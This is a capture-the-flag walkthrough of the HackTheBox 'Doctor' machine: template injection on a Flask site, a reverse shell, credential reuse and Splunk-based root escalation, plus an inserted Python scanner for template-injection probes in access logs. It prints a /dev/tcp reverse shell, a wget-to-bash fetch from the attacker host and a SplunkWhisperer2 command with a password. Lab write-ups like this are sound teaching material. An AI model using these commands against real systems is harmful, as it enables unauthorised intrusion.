
HackTheBox - Doctor

Foothold

Nmap scan (open ports)

```console
$ nmap -min-rate 5000 --max-retries 1 -sC -sV -p- 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 10:19 CET
Nmap scan report for doctors.htb (10.10.10.209)
Host is up (0.094s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-server-header: 
|   Apache/2.4.41 (Ubuntu)
|_  Werkzeug/1.0.1 Python/3.8.2
| http-title: Doctor Secure Messaging - Login
|_Requested resource was http://doctors.htb/login?next=%2F
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Apache httpd 2.4.41 (port 80)

When we go to http://10.10.10.209/, one of the first things we notice is:

[Screenshot: web]

After adding doctors.htb to /etc/hosts we get a totally different page:

[Screenshot: doctors.htb domain]

SSTI (Server Side Template Injection)

If we check the source code of the main page, we can see there is a link to http://doctors.htb/archive (commented out):

[Screenshot: /archive]

After trying many types of injections in http://doctors.htb/post/new, we can figure out that the website is vulnerable to template injection.

As we can see:

[Screenshot: payload in new messages]

The payload above leads to this render result in http://doctors.htb/archive:

[Screenshot: SSTI render result]
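A defensive counterpart to the probing described above, added here as example code (it is not from the original post or from any tool it uses): a stdlib-only Python scanner that parses Apache combined access-log lines, fully percent-decodes each query parameter (so double encoding cannot hide the delimiters) and flags Jinja2 template syntax. The log lines are constructed for the example; since form bodies such as the /post/new POST never reach the access log, this only catches probes carried in GET parameters.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" access-log line; we only need client IP, method and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Jinja2 openers: {{ expression }}, {% statement %}, {# comment #}.
TEMPLATE_RE = re.compile(r'\{\{|\{%|\{#')

# Constructed sample lines (not real traffic): the second and third carry template
# probes (the third double percent-encoded); the last is a benign use of braces.
SAMPLE_LOG = [
    '10.10.14.9 - - [16/Dec/2020:10:25:01 +0100] "GET /archive HTTP/1.1" 200 611 "-" "curl/7.72"',
    '10.10.14.9 - - [16/Dec/2020:10:26:14 +0100] "GET /post/new?title=%7B%7B7*7%7D%7D HTTP/1.1" 200 611 "-" "curl/7.72"',
    '10.10.14.9 - - [16/Dec/2020:10:27:30 +0100] "GET /archive?input=%257B%257B+7*7+%257D%257D HTTP/1.1" 200 611 "-" "curl/7.72"',
    '10.10.14.9 - - [16/Dec/2020:10:28:02 +0100] "GET /search?q=set+%7Bnot+a+template%7D HTTP/1.1" 200 611 "-" "curl/7.72"',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing, so double encoding cannot hide delimiters."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ssti_indicators(log_lines):
    """Return (client_ip, path, param_name, decoded_value) for every query parameter
    whose decoded value contains a Jinja2 delimiter. Unparseable lines are skipped."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group('target'))
        for pair in url.query.split('&'):
            name, _, raw = pair.partition('=')
            decoded = fully_decode(raw)
            if TEMPLATE_RE.search(decoded):
                hits.append((m.group('ip'), url.path, name, decoded))
    return hits


if __name__ == '__main__':
    for ip, path, name, value in find_ssti_indicators(SAMPLE_LOG):
        print(f'{ip} {path} param={name!r} value={value!r}')
```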

Now let's get a reverse shell.

Reverse shell

Thanks to the payload above, we can now pass another GET parameter, "input", to http://doctors.htb/archive.

We inject Python templates because the target server is a Werkzeug server version 1.0.1 using Python version 3.8.2.

[Screenshot: SSTI payload adding the input GET parameter]

This parameter takes a shell command that we want to run, for instance ls:

/archive?input=ls

In order to have a reverse shell, I created a file called reverse.sh:

```bash
bash -i >& /dev/tcp/10.10.14.9/4444 0>&1
```

On my machine, I ran an HTTP server:

```console
$ python3 -m http.server
```

If we type this URL into our browser, we get a shell on the target server as the user web:

http://doctors.htb/archive?input=wget -O - http://10.10.14.9:8000/reverse.sh | bash

[Screenshot: reverse shell as web user]

User (shaun)

There is another user on the machine: shaun.

```console
web@doctor:~$ cd /home
web@doctor:/home$ ls
shaun
web
web@doctor:/home$ cd shaun
web@doctor:/home/shaun$ ls
user.txt
```

I ran linpeas.sh and noticed this interesting log entry:

[Screenshot: reset password]

```console
web@doctor:/var/backups$ su - shaun
su - shaun
Password: Guitar123
id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
# Spawning a TTY Shell
python3 -c "import pty; pty.spawn('/usr/bin/bash')"
shaun@doctor:~$
shaun@doctor:~$ cat user.txt
cat user.txt
0d5dec4a853e2f82567c3d0792b7a679
```

Root

Remember the nmap scan? We saw that Splunk is running on the target server:

[Screenshot: ps auxf - splunkd]

[Screenshot: uncommon passwd files]

By looking for “splunk privilege escalation”, we find this repo https://github.com/cnotin/SplunkWhisperer2.

PySplunkWhisperer2_remote.py allows us to run a remote payload as root:

[Screenshot: SplunkWhisperer2]

Payload:

```console
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.9 --username shaun --password Guitar123 --payload "cat /root/root.txt > /dev/shm/flag; chmod 444 /dev/shm/flag"
```

Finally, we get the flag:

[Screenshot: Root flag]


This post is licensed under CC BY 4.0 by the author.